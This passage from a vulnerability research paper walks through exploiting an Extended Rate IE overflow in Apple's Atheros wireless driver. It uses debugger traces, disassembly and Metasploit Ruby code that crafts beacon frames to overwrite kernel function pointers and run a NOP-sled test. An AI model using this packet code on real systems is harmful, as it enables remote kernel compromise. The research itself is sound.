u_int16_t se_timoff; /* byte offset to TIM ie */ u_int16_t se_fhdwell; /* FH only (host byte order) */ u_int8_t se_fhindex; /* FH only */ u_int8_t se_erp; /* ERP from beacon/probe resp*/ int8_t se_rssi; /* avg'd recv ssi */ u_int8_t se_dtimperiod; /* DTIM period */ u_int8_t *se_wpa_ie; /* captured WPA ie */ u_int8_t *se_rsn_ie; /* captured RSN ie */ u_int8_t *se_wme_ie; /* captured WME ie */ u_int8_t *se_ath_ie; /* captured Atheros ie */ u_int se_age; /* age of entry (0 on create) */ }; IEEE80211_RATE_MAX_SIZE is defined in ieee80211.h as the following: #define IEEE80211_RATE_MAXSIZE 15 /* max rates we'll handle */ The author was initially puzzled because all research to this point showed that the Extended Rate buffer was the culprit but the madwifi source code had a check for a maximum length before the copy happened. At this point, the corruption must have occurred before the staadd function or the length check did not work as expected. To figure out what might be missing, the author set a break point at the beginning of staadd and walked through the code. Single-stepping showed that the memcpy was called at 0x008f3188. This was verified by looking at the size and the source being passed to the memcpy. Since the Extended Rate element in a script-generated packet it is noticeably larger than in a typical packet, a conditional breakpoint can be set when the size argument is pushed to the stack for the memcpy. The following debugger output shows how the system behaves when this breakpoint is set: (gdb) break *0x008f3188 if $eax > 100 Breakpoint 2 at 0x8f3188 (gdb) c Continuing. Breakpoint 2, 0x008f3188 in sta_add () 2: x/i $eip 0x8f3188 : mov DWORD PTR [esp+8],eax (gdb) stepi 0x008f318c in sta_add () 2: x/i $eip 0x8f318c : mov DWORD PTR [esp+4],edx (gdb) 0x008f3190 in sta_add () 2: x/i $eip 0x8f3190 : lea eax,[esi+63] (gdb) 0x008f3193 in sta_add () 2: x/i $eip 0x8f3193 : mov DWORD PTR [esp],eax (gdb) 0x008f3196 in sta_add () 2: x/i $eip 0x8f3196 : call 0x1933c8 (gdb) x/20x $esp 0xc82badc: 0x03aeb643 0x1e36a046 0x000000f2 0x00000080 0xc82baec: 0x0c82bb24 0x0c82bb04 0x0c82bc8c 0x03800004 0xc82bafc: 0x0393d72c 0x0393d704 0x1e36a00a 0x0380246c 0xc82bb0c: 0x008f2e35 0x00000014 0x00000302 0x0c82bc8c 0xc82bb1c: 0x00000080 0x1e36a138 0x0c82bb84 0x008e8cb9 (gdb) x/20x 0x1e36a046 0x1e36a046: 0x4141f032 0x41414141 0x41414141 0x41414141 0x1e36a056: 0x41414141 0x41414141 0x41414141 0x41414141 0x1e36a066: 0x41414141 0x41414141 0x41414141 0x41414141 0x1e36a076: 0x41414141 0x41414141 0x41414141 0x41414141 0x1e36a086: 0x41414141 0x41414141 0x41414141 0x41414141 (gdb) Based on the location of the memcpy call, it is necessary to calculate the relative address within the binary which can be accomplished by doing 0x8f3196 - 0x8e7000 - 0x1000 = 0xB196. The code found within the driver shows that although there is a length check in the open source driver, it's not actually present in the OS X binary driver. __text:0000B177 mov ecx, [ebp+scanparam] __text:0000B17A mov edx, [ecx+28h] __text:0000B17D test edx, edx __text:0000B17F jz short loc_B19D __text:0000B181 movzx eax, byte ptr [edx+1] __text:0000B185 add eax, 2 __text:0000B188 mov [esp+48h+var_40], eax __text:0000B18C mov [esp+48h+var_44], edx __text:0000B190 lea eax, [esi+63] __text:0000B193 mov [esp+48h+ic], eax __text:0000B196 call near ptr _memcpy ; xrate memcpy In this example, the copy size is 0xf2 and the ``Extended Rate'' buffer is being copied. Verifying that there is actually no length check means that adjacent data found within a ieee80211scanentry is being corrupted, such as another staentry structure. This is where the first of two serious problems manifests itself. It is possible to overwrite fields in a structure, but not typical control structures like stack or heap frames that are typically used to gain code execution. This makes direct code execution more difficult. 6) Getting Code Execution The result of this flaw is that many things beyond the Extended Rate buffer in the ieee80211scanentry structure are corrupted. In a traditional stack overflow, control of execution flow is obtained directly by overwriting an important value, such as the return address. The corruption caused by the ``Extended Rate'' bug is more complicated due to the apparent lack of adjacent control structures. The most promising avenue for getting execution can be found in a function named athcopyscanresults. This function uses the fields that are overwritten to copy memory. An attacker can control the size of the copy and the source of the copy. In addition to crashing reliably on the same data, the size of the memcpy is two bytes wide meaning that up to 65535 bytes can be copied. Since the destination of the memcpy is a structure that ends with a function pointer, the hope is that enough data can written outside of the destination buffer to the point where the function pointer is overwritten. In this way, the next time the function pointer is called, the caller would instead jump to whatever address is now stored in the function pointer. In other words, this represents a two-stage overwrite. The first overwrite does not provide direct code execution, but it allows an attacker to create a second overwrite that will. The Beacon packet contains a number of buffers one can use for this second-stage overwrite. Thus, an overflow in one buffer in the packet (the Extended Rate IE) allows an attacker to control how a second buffer is copied (in this case, the Robust Security Network (RSN) IE). It is the copying of the second buffer that will permit code execution. Below are the registers and the stack trace of a call to the second memcpy that is being discussed. (gdb) bt #0 0x001933de in memcpy_common () #1 0x038ce804 in ?? () #2 0x008c6083 in sta_iterate () #3 0x008e52b7 in AirPort_Athr5424::ieee80211_notify_scan_done () #4 0x008e55b9 in AirPort_Athr5424::setSCAN_REQ () (gdb) info registers eax 0xaca0000 181010432 ecx 0xc98 3224 edx 0x3263 12899 ebx 0x8 8 esp 0xc71b714 0xc71b714 ebp 0xc71b758 0xc71b758 esi 0x41316341 1093755713 edi 0xaca0000 181010432 eip 0x1933de 0x1933de eflags 0x10203 66051 cs 0x8 8 ss 0x10 16 ds 0x120010 1179664 es 0xc710010 208732176 fs 0x10 16 gs 0x900048 9437256 (gdb) EDX contains the size of the copy before its loaded into ECX. The bytes in sequence were 0x41 0x63 0x31 0x41 0x32 0x63 meaning that the source address (what is found in ESI) and the copy size are adjacent to one other in the packet. The pattern that overwrote the buffer was also always 0x41 from the start of the ``Extended Rate'' field in the Beacon packet. Although this seems like an interesting plan, a call to IOMalloc right before the memcpy makes sure the destination buffer has enough space for the copy. Additionally, although a copy of up to 0xffff bytes is possible, it's not actually writing outside of any bounds. The disassembly for the memcpy call in athcopyscanresults is shown below: __text:000260AA call near ptr _IOMalloc __text:000260AF mov edx, eax __text:000260B1 mov ecx, [ebp+var_1C] __text:000260B4 mov [ecx+88h], eax __text:000260BA test eax, eax __text:000260BC jz loc_262C8 __text:000260C2 movzx eax, word ptr [esi+84h] __text:000260C9 mov [esp+38h+var_30], eax __text:000260CD mov eax, [esi+80h] __text:000260D3 mov [esp+38h+var_34], eax __text:000260D7 mov [esp+38h+var_38], edx __text:000260DA call near ptr _memcpy The author could go on for hours about what other methods also did not work, but what does work seems more interesting. Luckily, almost immediately after the corruption of memory, the driver calls a function named ieee80211savie four times. The purpose of these calls is to save other Information Elements (such as RSN, WME, and WPA) from the Beacon frame into the staentry structure. The source code from the Madwifi version of ieee80211saveie: void ieee80211_saveie(u_int8_t **iep, const u_int8_t *ie) { u_int ielen = ie[1] + 2; /* * Record information element for later use. */ if (*iep == NULL || (*iep)[1] != ie[1]) { if (*iep != NULL) FREE(*iep, M_DEVBUF); MALLOC(*iep, void*, ielen, M_DEVBUF, M_NOWAIT); } if (*iep != NULL) memcpy(*iep, ie, ielen); } A quick synopsis of this function's purpose is that a pointer to a pointer is passed as the address to copy data to. There is some sanity checking to see if the destination address is NULL or if the size of the stored buffer at the destination address is different than the one just passed in. If either of these conditions are true, a new buffer is malloced and the memcpy works just fine. Since an attacker can control every element in the structure that's passed in as the place to save the buffer to, the check to see if a malloc should be performed can be avoided and the buffer can be copied anywhere into memory the attacker chooses. This is pretty simple. All that needed is the address the data will be copied to, plus 1, equals the length of the IE buffer that is to be saved. Although there are countless possibilities for what to overwrite, the target buffer needs to meet a few basic requirements. Preferably, an attacker will overwrite a function pointer. Since it seems that the driver loads at the same address every time, overwriting something that that is a fixed offset inside the driver is preferable to minimize the amount of damage done outside the driver because one will want the machine to keep running long enough to execute a payload. There is a structure called stadefault. This structure keeps function pointers needed to carry out certain elements of driver operations and luckily it appears to be recreated quite often so that any damage done to it could automatically repair itself. Here is the structure from the Madwifi source code: static const struct ieee80211_scanner sta_default = { .scan_name = "default", .scan_attach = sta_attach, .scan_detach = sta_detach, .scan_start = sta_start, .scan_restart = sta_restart, .scan_cancel = sta_cancel, .scan_end = sta_pick_bss, .scan_flush = sta_flush, .scan_add = sta_add, .scan_age = sta_age, .scan_iterate = sta_iterate, .scan_assoc_fail = sta_assoc_fail, .scan_assoc_success = sta_assoc_success, .scan_default = ieee80211_sta_join, }; During actual live debugging its contents can be seen as: (gdb) x/20x sta_default 0x931ee0 : 0x0092e050 0x008f1543 0x008f16c6 0x008f18c7 0x931ef0 : 0x008f19b5 0x008f19cc 0x008f2b7d 0x008f1694 0x931f00 : 0x008f2e2f 0x008f261e 0x008f20bb 0x008f2188 0x931f10 : 0x008f1fd5 0x00000000 0x00000000 0x00000000 0x931f20 : 0x000000a0 0x00000140 0x000000a0 0x000000c0 (gdb) As an initial test, the author overwrote every function pointer in the structure with a pattern such as 0x61413761 (or aA7a in ASCII, which is the typical Metasploit buffer padding pattern). A crash dump with an error message about failing to execute code at a bad address like 0x61413761 proves that remote code execution is theoretically possible. To help better understand this, it is helpful to single-step through the staadd function after sending an Extended Rate IE that is larger than 100 bytes. It is also helpful to then single-step through the function that handles saving the RSN IE buffer from the packet called. Finally, it is useful to single-step through the ieee80211saveie until the size comparison is hit. The kernel should crash the next time any of the overwritten function pointers are called. The code used to generate the packet during this single step is shown below: ssid = Rex::Text.rand_text_alphanumeric(rand(255)) bssid = "\x61\x61\x61" + Rex::Text.rand_text(3) seq = [rand(255)].pack('n') xrate = make_xrate() rsn = make_rsn() frame = "\x80" + "\x00" + "\x00\x00" + "\xff\xff\xff\xff\xff\xff" + bssid + bssid + seq + Rex::Text.rand_text(8) + "\xff\xff" + Rex::Text.rand_text(2) + #ssid tag "\x00" + ssid.length.chr + ssid + #supported rates "\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48" + #current channel "\x03" + "\x01" + channel.chr + #Xrate xrate + #RSN rsn def make_xrate #calculate the offset that RSN needs to overwrite staRsnOff = 0x4aee0 kextAddr = datastore['KEXT_OFF'].to_i staStruct = kextAddr + staRsnOff #build the xrate_frame xrate_build = Rex::Text.pattern_create(240) #base of IE #crashes often occur in the following locations so they are blanked xrate_build[67, 2]="\x00\x00" xrate_build[71, 4]="\x00\x00\x00\x00" xrate_build[79, 4]="\x00\x00\x00\x00" #Overwrite address for RSN element xrate_build[55, 4]=[staStruct].pack('V') xrate_frame = "\x32" + xrate_build.length.chr + xrate_build return xrate_frame end def make_rsn rsn_data = Rex::Text.pattern_Create(223) rsn_frame = "\x30" + rsn_data.length.chr + rsn_data return rsn_frame end And the associated single-step through the functions: Breakpoint 4, 0x008f3188 in sta_add () 2: x/i $eip 0x8f3188 : mov DWORD PTR [esp+8],eax (gdb) advance *0x8f32fe 0x008f32fe in sta_add () 2: x/i $eip 0x8f32fe : call 0x8f521b (gdb) stepi 0x008f521b in ieee80211_saveie () 2: x/i $eip 0x8f521b : push ebp (gdb) 0x008f521c in ieee80211_saveie () 2: x/i $eip 0x8f521c : mov ebp,esp (gdb) 0x008f521e in ieee80211_saveie () 2: x/i $eip 0x8f521e : push edi (gdb) 0x008f521f in ieee80211_saveie () 2: x/i $eip 0x8f521f : push esi (gdb) 0x008f5220 in ieee80211_saveie () 2: x/i $eip 0x8f5220 : push ebx (gdb) 0x008f5221 in ieee80211_saveie () 2: x/i $eip 0x8f5221 : sub esp,0x2c (gdb) 0x008f5224 in ieee80211_saveie () 2: x/i $eip 0x8f5224 : mov edi,DWORD PTR [ebp+8] (gdb) 0x008f5227 in ieee80211_saveie () 2: x/i $eip 0x8f5227 : mov eax,DWORD PTR [ebp+12] (gdb) 0x008f522a in ieee80211_saveie () 2: x/i $eip 0x8f522a : movzx edx,BYTE PTR [eax+1] (gdb) 0x008f522e in ieee80211_saveie () 2: x/i $eip 0x8f522e : movzx ebx,dl (gdb) info registers eax 0x1e3ae130 507175216 ecx 0xc8cbc8c 210549900 edx 0xe0 224 ebx 0x388f004 59305988 esp 0xc8cba9c 0xc8cba9c ebp 0xc8cbad4 0xc8cbad4 esi 0x388f004 59305988 edi 0x388f07c 59306108 eip 0x8f522e 0x8f522e eflags 0x216 534 cs 0x8 8 ss 0x10 16 ds 0x10 16 es 0x190010 1638416 fs 0xc8c0010 210501648 gs 0x48 72 (gdb) stepi 0x008f5231 in ieee80211_saveie () 2: x/i $eip 0x8f5231 : lea eax,[ebx+2] (gdb) 0x008f5234 in ieee80211_saveie () 2: x/i $eip 0x8f5234 : mov DWORD PTR [ebp-28],eax (gdb) 0x008f5237 in ieee80211_saveie () 2: x/i $eip 0x8f5237 : mov eax,DWORD PTR [edi] (gdb) 0x008f5239 in ieee80211_saveie () 2: x/i $eip 0x8f5239 : test eax,eax (gdb) 0x008f523b in ieee80211_saveie () 2: x/i $eip 0x8f523b : je 0x8f5254 (gdb) 0x008f523d in ieee80211_saveie () 2: x/i $eip 0x8f523d : cmp dl,BYTE PTR [eax+1] (gdb) info registers eax 0x931ee0 9641696 ecx 0xc8cbc8c 210549900 edx 0xe0 224 ebx 0xe0 224 esp 0xc8cba9c 0xc8cba9c ebp 0xc8cbad4 0xc8cbad4 esi 0x388f004 59305988 edi 0x388f07c 59306108 eip 0x8f523d 0x8f523d eflags 0x202 514 cs 0x8 8 ss 0x10 16 ds 0x10 16 es 0x190010 1638416 fs 0xc8c0010 210501648 gs 0x48 72 (gdb) x/20x $eax 0x931ee0 : 0x0092e050 0x008f1543 0x008f16c6 0x008f18c7 0x931ef0 : 0x008f19b5 0x008f19cc 0x008f2b7d 0x008f1694 0x931f00 : 0x008f2e2f 0x008f261e 0x008f20bb 0x008f2188 0x931f10 : 0x008f1fd5 0x00000000 0x00000000 0x00000000 0x931f20 : 0x000000a0 0x00000140 0x000000a0 0x000000c0 (gdb) c Continuing. Program received signal SIGTRAP, Trace/breakpoint trap. 0x61413761 in ?? () 1: x/i $eip 0x61413761: Disabling display 1 to avoid infinite recursion. Cannot access memory at address 0x61413761 (gdb) bt #0 0x61413761 in ?? () #1 0x008e977c in scan_next () Previous frame inner to this frame (corrupt stack?) (gdb) As can be seen above, the kernel attempted to execute an instruction at the invalid address 0x61413761. This address was provided in the generated packet. While this does not show actual cod execution, it does prove that code execution is possible. An attacker can overwrite every member of that structure with the address to arbitrary memory that is controllable. Since one has to match the size of the base of stadefault+1, the buffer needs to be 0xe0 in length. This means that since stadefault is 64 bytes, one writes more than is needed. Immediately after stadefault in memory is a structure called chanflags which is also at a predictable address. To execute code of an attacker's choosing, the remainder of the RSN IE buffer can be packed with nops that will end with 0xcc 0xcc 0xcc 0xcc which will cause a trap to the debugger making it possible to exam the state and verify code actually executed. (0xcc is the machine code for the int 3 assembly instruction, which causes a processor interrupt that a debugger can safely catch). This is an important step as OS X claims to have NX protection that would prohibit certain memory regions from executing code. Executing a NOP sled then 0xcc will prove that protection technologies like NX do not affect execution in this situation. The following Ruby code shows how the packet described above can be generated: ssid = Rex::Text.rand_text_alphanumeric(rand(255)) bssid = "\x61\x61\x61" + Rex::Text.rand_text(3) seq = [rand(255)].pack('n') xrate = make_xrate() rsn = make_rsn() frame = "\x80" + "\x00" + "\x00\x00" + "\xff\xff\xff\xff\xff\xff" + bssid + bssid + seq + Rex::Text.rand_text(8) + "\xff\xff" + Rex::Text.rand_text(2) + #ssid tag "\x00" + ssid.length.chr + ssid + #supported rates "\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48" + #current channel "\x03" + "\x01" + channel.chr + #Xrate xrate + #RSN rsn def make_xrate #calculate the offset that RSN needs to overwrite staRsnOff = 0x4aee0 kextAddr = datastore['KEXT_OFF'].to_i staStruct = kextAddr + staRsnOff #build the xrate_frame xrate_build = Rex::Text.pattern_create(240) #base of IE #crashes often occur in the following locations so they are blanked xrate_build[67, 2]="\x00\x00" xrate_build[71, 4]="\x00\x00\x00\x00" xrate_build[79, 4]="\x00\x00\x00\x00" #Overwrite address for RSN element xrate_build[55, 4]=[staStruct].pack('V') xrate_frame = "\x32" + xrate_build.length.chr + xrate_build return xrate_frame end def make_rsn #calculate the address to overwrite the sta_default rsnTargetOff = 0x4af20 kextAddr = datastore['KEXT_OFF'].to_i rsnOvrAddr = kextAddr + rsnTargetOff #need two bytes for alingment rsn_pad = "\x00\x00" #copy the address of the payload over ever element in sta_default rsnAddrTmp=[rsnOvrAddr].pack('V') rsn_overwrite_addr = (rsnAddrTmp * 15) rsn_code_size = 162 rsn_code = ("\x90" * rsn_code_size) rsn_code[10, 4]="\xcc\xcc\xcc\xcc" rsn_build = rsn_pad + rsn_overwrite_addr + rsn_code rsn_frame = "\x30" + rsn_build.length.chr + rsn_build return rsn_frame end After firing off this packet, the debugger breaks on a breakpoint trap: (gdb) c Continuing. Program received signal SIGTRAP, Trace/breakpoint trap. 0x00931f2b in chanflags () 2: x/i $eip 0x931f2b : int3 (gdb) info registers eax 0x931ee0 9641696 ecx 0x431bde83 1125899907 edx 0x0 0 ebx 0x31cf9 204025 esp 0xc863ed8 0xc863ed8 ebp 0xc863f64 0xc863f64 esi 0x380346c 58733676 edi 0x3801004 58724356 eip 0x931f2b 0x931f2b eflags 0x246 582 cs 0x8 8 ss 0x10 16 ds 0x10 16 es 0xa4810010 -1535049712 fs 0x10 16 gs 0x12260048 304480328 (gdb) x/i $eip 0x931f2b : int3 (gdb) x/i $eip-1 0x931f2a : int3 (gdb) x/i $eip-2 0x931f29 : nop (gdb) The previous instruction was an int 3 and before that was a NOP. This proves that the code execution test was successful. As it stands one needs 64 bytes to overwrite stadefault and the RSN buffer has to be 48 bytes long which leaves 160 bytes for first stage shellcode. This is more than enough to locate and execute a second stage. In other words, the Apple driver will copy five IEs from the original packet. One can cause an overflow in one of these elements, the Extended Rate IE, to overwrite structures that determine how the remaining four elements are copied. The copy of the RSN IE is chosen to make it possible to overwrite function pointers and store a first stage shellcode. The remaining three IEs, roughly 765 bytes in total, can be used to contain the real shellcode that does something useful, such as a connect-back shell, add a root user account, or play fun sounds on the speaker. 6) Acknowledgements The author would like to thank a few different people for the massive amount of help. Jon Ellch taught me how to do wireless injection and driver auditing. His wife explained public key cryptography to me (``You see, its really just a complex math problem with REALLY big numbers''). Josh Wright and Mike Kershaw wrote and released LORCON, which is the basis for everything I have done. Rob Graham is awesome. HD Moore, Matt Miller, and the Metasploit project provide a simple to use, extensible exploit framework that can bring things like driver vulnerabilities to the masses. Porting this exploit to Metasploit was pretty much a snap. Almost all of the Metasploit examples for the Atheros overflow were derived from HD Moore's fuzzbeacon.rb script. Rich Mogull provided edits and advice. 7) Conclusion This paper has given a quick walk-through of a real vulnerability in Apple's wireless driver in terms of discovery and exploitation. Getting code execution is only one part of an exploit. To do something useful, an attacker needs kernel-mode shellcode. That subject will be covered in a future paper. The exploit discussed in this paper is just a proof-of-concept since, as it stands now, one needs to know what the load address of the kernel module on the target machine. This is a choice, not a restriction. This method of gaining execution is well suited to a proof-of-concept. Creation of a weaponized exploit that can execute arbitrary code with no prior knowledge is just as easy. It's just a matter of overwriting different parts of the kernel. If the reader is interested in OS X kernel shellcode design, be sure to review the example scripts that contain different payloads that could be packed into the RSN IE and other optional elements. References [1] Apple, Inc. The Universal File Format. http://developer.apple.com/documentation/DeveloperTools/Conceptual/MachORuntime/Reference/reference.html#//apple_ref/doc/uid/20001298-154889 [2] Apple, Inc. Lipo man page. http://developer.apple.com/documentation/Darwin/Reference/ManPages/man1/lipo.1.html [3] Apple, Inc. Setting up OS X live kernel Debugging. http://developer.apple.com/documentation/Darwin/Conceptual/KEXTConcept/KEXTConceptDebugger/hello_debugger.html [4] Wikipedia. Graphical OS Kernel Panic. http://en.wikipedia.org/wiki/Image:MacOS X_kernel_panic.png. [5] BackTrack. BackTrack 2. http://www.remote-exploit.org/backtrack.html [6] Wikipedia. LORCON. http://en.wikipedia.org/wiki/Lorcon [7] Metasploit. Metasploit. http://www.metasploit.com